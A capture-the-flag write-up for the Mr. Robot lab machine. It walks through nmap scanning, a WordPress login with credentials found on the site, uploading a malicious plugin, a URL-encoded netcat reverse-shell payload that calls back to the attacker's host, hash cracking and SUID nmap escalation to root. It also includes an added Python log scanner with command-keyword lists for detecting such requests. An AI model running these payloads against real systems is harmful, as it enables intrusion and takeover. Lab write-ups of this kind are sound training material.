Mr. Robot CTF

# Solution

# Finding the vulnerability

nmap shows open ports 80 and 443.

```bash
mkdir nmap && nmap -p- -Pn -vv 10.10.231.235 -oN nmap/10.10.231.235-ports
```

We run -A on the open ports.

```bash
ports=$(grep '^[0-9]' nmap/10.10.231.235-ports | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -A  -p $ports -vv 10.10.231.235 -oA nmap/10.10.231.235-aggressive-scan
```

We find the first key on /robots.txt.

We find a username and password on /license.

```bash
feroxbuster -u http://10.10.231.235
```

```bash
echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
```

We use the username and password to log in to /wp-login.php.

```
elliot:ER28-0652
```

# Foothold

We create and upload a malicious plugin with wordpwn.py.

```bash
wget https://raw.githubusercontent.com/wetw0rk/malicious-wordpress-plugin/refs/heads/master/wordpwn.py
```

```bash
python wordpwn.py 10.6.66.180 4444 10.10.231.235
```


We navigate to /wp-content/plugins/malicious/SWebTheme.php?cmd=ls.

Next, we get a reverse shell with a URL-encoded nc mkfifo payload from www.revshells.com.

```bash
rlwrap -cAr nc -lvnp 9001
```

/wp-content/plugins/malicious/SWebTheme.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.6.66.180%209001%20%3E%2Ftmp%2Ff
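
From the defender's side, both requests above stand out in the web server's access log. The following is an added example, not part of the original write-up: it scans combined-format log lines for requests to plugin PHP files whose decoded parameters look like shell commands. The log lines are constructed, and the parameter-name and keyword lists are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format) for illustration only.
SAMPLE_LOG = """\
10.6.66.180 - - [01/Jan/2025:10:00:01 +0000] "GET /wp-content/plugins/malicious/SWebTheme.php?cmd=ls HTTP/1.1" 200 312 "-" "curl/8.0"
10.6.66.180 - - [01/Jan/2025:10:00:09 +0000] "GET /wp-content/plugins/malicious/SWebTheme.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.6.66.180%209001%20%3E%2Ftmp%2Ff HTTP/1.1" 200 0 "-" "curl/8.0"
192.0.2.7 - - [01/Jan/2025:10:01:00 +0000] "GET /wp-content/plugins/akismet/akismet.php?ver=5.3 HTTP/1.1" 200 120 "-" "Mozilla/5.0"
192.0.2.7 - - [01/Jan/2025:10:01:05 +0000] "GET /wp-login.php?redirect_to=%2Fwp-admin%2F HTTP/1.1" 200 2400 "-" "Mozilla/5.0"
"""

# The heuristic lists below are assumptions for this example, not a complete rule set.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
PLUGIN_PHP_RE = re.compile(r"^/wp-content/plugins/[^/]+/.*\.php$", re.I)
SHELL_META_RE = re.compile(r"[;|&`<>]|\$\(")
COMMAND_WORDS_RE = re.compile(r"\b(?:mkfifo|nc|ncat|bash|sh|wget|curl|python3?)\b")
EXEC_PARAM_NAMES = {"cmd", "exec", "command", "c"}

def score_request(target):
    """Return a list of reasons a request target looks like command execution."""
    parts = urlsplit(target)
    if not PLUGIN_PHP_RE.match(parts.path):
        return []
    reasons = []
    # parse_qsl percent-decodes each value, so encoded metacharacters are visible.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in EXEC_PARAM_NAMES:
            reasons.append(f"exec-style parameter '{name}'")
        if SHELL_META_RE.search(value):
            reasons.append(f"shell metacharacters in '{name}'")
        if COMMAND_WORDS_RE.search(value):
            reasons.append(f"command name in '{name}'")
    return reasons

def scan(log_text):
    """Return (client_ip, timestamp, path, reasons) for each suspicious line."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, ts, _method, target, _status = m.groups()
        reasons = score_request(target)
        if reasons:
            findings.append((ip, ts, urlsplit(target).path, reasons))
    return findings

if __name__ == "__main__":
    for ip, ts, path, reasons in scan(SAMPLE_LOG):
        print(f"{ts} {ip} {path}: {', '.join(reasons)}")
```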


# Privilege Escalation

We upgrade our shell.

1. `python3 -c 'import pty; pty.spawn("/bin/bash")'`
2. CTRL + Z
3. `stty raw -echo;fg`
4. [Enter] [Enter]

We find a user robot and a password file we can read.

```bash
ls /home/
cd /home/robot
ls -la
```

We crack the password hash.

```bash
hashcat -m 0 hash /usr/share/wordlists/rockyou.txt
```

```
robot:abcdefghijklmnopqrstuvwxyz
```

We su into the robot user and get the second flag.

```
su robot
password: abcdefghijklmnopqrstuvwxyz
cat key-2-of-3.txt
```

We find nmap with SUID privileges.

```bash
find / -type f -perm -4000  2>/dev/null
```

We use GTFOBins to get root and the last flag.

```
nmap --interactive
!sh
cd /root
cat key-3-of-3.txt
```
